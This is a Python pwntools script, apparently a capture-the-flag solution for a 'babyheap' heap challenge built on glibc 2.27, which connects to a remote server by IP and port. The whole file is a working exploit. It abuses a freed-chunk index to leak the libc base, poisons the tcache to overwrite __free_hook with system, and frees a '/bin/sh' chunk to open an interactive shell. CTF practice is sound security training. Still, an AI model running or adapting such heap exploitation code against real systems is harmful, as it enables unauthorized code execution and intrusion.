1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74
|
from pwn import * from hashlib import sha256 from pwnlib.util.iters import count
context.log_level = "debug" context.arch = "amd64"
elf = ELF("./babyheap") libc = ELF("./libc-2.27.so")
def add(size, content): p.sendlineafter(b">>> ", b"1") p.sendlineafter(b"idx is ", str(size).encode()) p.sendafter(b"next the content: ", content)
def show(idx): p.sendlineafter(b">>> ", b"2") p.sendlineafter(b"house index: ", str(idx).encode()) def edit(idx, content): p.sendlineafter(b">>> ", "3") p.sendlineafter(b"house index: ", str(idx).encode()) p.sendafter(b"content(size 8): ", content)
def delete(idx): p.sendlineafter(b">>> ", b"4") p.sendlineafter(b"house index: ", str(idx).encode())
p = remote("47.98.229.103", "1337") add(0x1F0, b"a" * 0x1F0) add(0x1F0, b"a" * 0x1F0) add(0x1F0, b"a" * 0x1F0) add(0x1F0, b"a" * 0x1F0) add(0x1F0, b"a" * 0x1F0) add(0x1F0, b"a" * 0x1F0) add(0x1F0, b"a" * 0x1F0) add(0x1F0, b"a" * 0x1F0)
delete(1) delete(2) delete(3) delete(4) delete(5) delete(6) delete(7)
delete(1953723762)
show(0)
libc_base = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 0x3ebca0 log.info("libc_base: " + hex(libc_base))
add(0x8, b"b" * 0x8)
delete(1953723762)
edit(1, p64(libc_base + libc.sym["__free_hook"]))
add(0x8, b"/bin/sh\x00")
add(0x8, p64(libc_base + libc.sym["system"]))
delete(2)
p.interactive()
|